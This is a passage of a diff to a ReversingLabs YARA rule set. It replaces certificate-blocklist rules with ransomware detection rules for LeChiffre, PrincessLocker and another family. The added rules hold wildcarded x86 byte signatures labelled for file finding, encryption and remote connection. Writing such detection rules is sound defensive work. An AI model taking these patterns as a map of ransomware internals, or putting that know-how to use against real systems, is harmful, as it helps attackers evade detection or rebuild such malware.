+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ??
+            ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40
+            EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0
+            66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89
+            4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ??
+            6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ??
+            ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50
+            53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ??
+            FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ??
+            83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3
+        }
+		$find_files_p2 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44
+            24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8
+            ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB
+            ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF
+            76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF
+            15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF
+            74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syncode Sistemas e Tecnologia Ltda" and ( pe.signatures [ i ] . serial == "00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures [ i ] . serial == "e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" ) and 1373932799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LeChiffre ransomware."
 		author = "ReversingLabs"
-		id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2654-L2670"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad"
+		logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LeChiffre"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6339d548-775b-52b9-84c5-a79de23a16b2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2672-L2688"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45
+            ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B
+            D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45
+            ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ??
+            ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection_2 = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection_3 = {
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ??
+            ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ??
+            8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF
+            75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_1 = {
+            E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B
+            03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ??
+            ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ??
+            68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_2 = {
+            E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00
+            8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
+        }
+		$find_files = {
+            E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ??
+            84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46
+            33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B
+            F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75
+            ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ??
+            8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
+            45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ??
+            ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures [ i ] . serial == "53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3
 }
-
-rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PrincessLocker ransomware."
 		author = "ReversingLabs"
-		id = "763d4faf-19af-5349-a643-4773055df47a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2690-L2708"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd"
+		logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PrincessLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45
+            ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ??
+            ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D
+            46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ??
+            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC
+            33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
+            C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ??
+            ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF
+            ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF
+            B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
